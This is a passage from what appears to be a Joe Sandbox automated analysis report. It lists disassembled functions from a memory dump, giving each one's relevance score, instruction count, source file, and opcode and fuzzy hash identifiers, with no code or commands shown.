                    • Instruction Fuzzy Hash: 7A01D6FB30E270BDB241C56A3B54AFA6B7DD4C5B31331C827F947C550AE2592A4A7132
                    Function 04A20C86 Relevance: .1, Instructions: 74COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000000.00000002.2155255856.0000000004A20000.00000040.00001000.00020000.00000000.sdmp, Offset: 04A20000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_4a20000_file.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 32c9a252e0c989bbcd08a83dfa89c8f8f6ad0da28521648f421e8ff22cb60e0c
                    • Instruction ID: aee6d83ac4bf1d3c2bbd58170485d980f99b8d408cdce4ad4de6c007cfe0f591
                    • Opcode Fuzzy Hash: 32c9a252e0c989bbcd08a83dfa89c8f8f6ad0da28521648f421e8ff22cb60e0c
                    • Instruction Fuzzy Hash: BE01FBF730E130ADB241D51A3B54AFB67BEE5C4730371C42BF946C640AE3596A5A7031
                    Function 04A20C9F Relevance: .1, Instructions: 66COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000000.00000002.2155255856.0000000004A20000.00000040.00001000.00020000.00000000.sdmp, Offset: 04A20000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_4a20000_file.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 9ab13e8cb3e7497cf017938014e1cc56f65f1ebbc997de7eab22e3e5a6d2a949
                    • Instruction ID: 59bd444664a1830c8b6cee283ec20ac97c5104d5d5a24e7917f96e1bbb484a5e
                    • Opcode Fuzzy Hash: 9ab13e8cb3e7497cf017938014e1cc56f65f1ebbc997de7eab22e3e5a6d2a949
                    • Instruction Fuzzy Hash: 61F0AFFB21E131BCB041915A3B24AFB577EE0D4B34370C92BF907C580AE2496A8E3032
                    Function 04A20CB1 Relevance: .1, Instructions: 60COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000000.00000002.2155255856.0000000004A20000.00000040.00001000.00020000.00000000.sdmp, Offset: 04A20000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_4a20000_file.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 876980f140b5d71253d9d96fa830691c5ba2a2e77f8934bb0adee3569b49e5d4
                    • Instruction ID: 4b5eace3c4d91b3e2732d2cf9cbe2e4aff4f2359570c93ce92566972612150b1
                    • Opcode Fuzzy Hash: 876980f140b5d71253d9d96fa830691c5ba2a2e77f8934bb0adee3569b49e5d4
                    • Instruction Fuzzy Hash: 82F07FFB20E234BDB141955A3B64AFB577DE0C4B30331C92BF907C590AE2492A9E7132
                    Function 04A20CD2 Relevance: .0, Instructions: 40COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000000.00000002.2155255856.0000000004A20000.00000040.00001000.00020000.00000000.sdmp, Offset: 04A20000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_4a20000_file.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 7adc37bcecd20c89cf87dc9623cf43514c962b8e0695235d572ed735a21698a3
                    • Instruction ID: d9148fcd1d4afa411a54fd300868915e575c4dfcf86573f6712caa8115a9f0f5
                    • Opcode Fuzzy Hash: 7adc37bcecd20c89cf87dc9623cf43514c962b8e0695235d572ed735a21698a3
                    • Instruction Fuzzy Hash: E0E01ABB31E130FCB085965A3B64AFA5B3DE0D4735330C913F947C540AE2593A5A7571
                    Function 04A20CFC Relevance: .0, Instructions: 24COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000000.00000002.2155255856.0000000004A20000.00000040.00001000.00020000.00000000.sdmp, Offset: 04A20000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_4a20000_file.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 6e3c549df21c0406c681ccf178556d164821fd9bb6a7517374f622ec44a6d8e5
                    • Instruction ID: 8c4243e6e6ac3eca7ebbdd4b29d61b2b1ce8430404bcd17051aeb9b9386507a6
                    • Opcode Fuzzy Hash: 6e3c549df21c0406c681ccf178556d164821fd9bb6a7517374f622ec44a6d8e5
                    • Instruction Fuzzy Hash: EBD05E7624E430DE84C123396B553F26B353224639B200A02E68F97AC7E2693295B092